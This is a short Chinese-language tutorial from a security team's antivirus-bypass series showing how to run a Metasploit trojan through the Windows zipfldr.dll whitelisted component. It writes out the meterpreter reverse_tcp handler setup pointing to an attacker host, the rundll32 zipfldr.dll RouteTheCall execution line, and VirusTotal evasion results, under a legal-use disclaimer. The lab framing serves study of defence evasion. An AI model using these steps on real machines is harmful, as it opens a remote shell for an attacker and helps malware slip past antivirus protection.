声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。

说明：zipfldr.dll所在路径已被系统添加PATH环境变量中，因此，zipfldr.dll命令可识别，但由于为dll文件，需调用rundll32.exe来执行。Windows 2003 默认位置：

C:\Windows\System32\zipfldr.dllC:\Windows\SysWOW64\zipfldr.dll

Windows 7 默认位置：

C:\Windows\System32\zipfldr.dllC:\Windows\SysWOW64\zipfldr.dll

攻击机：10.211.55.10 kali

靶机：10.211.55.18 win7

由AVIator生成msf.exe。具体参考远控免杀专题(14)-AVIator(VT免杀率25/69)

将生成的msf.exe木马移动到靶机上。

metasploit监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 10.211.55.10run

靶机执行

rundll32.exe zipfldr.dll,RouteTheCall msf.exe

360提示恶意命令执行。点击允许后可上线

放在virustotal.com上msf.exe查杀率为19/69

三、参考资料

基于白名单zipfldr.dll执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/90_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95zipfldr.dll%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E5%85%AB%E5%AD%A3.html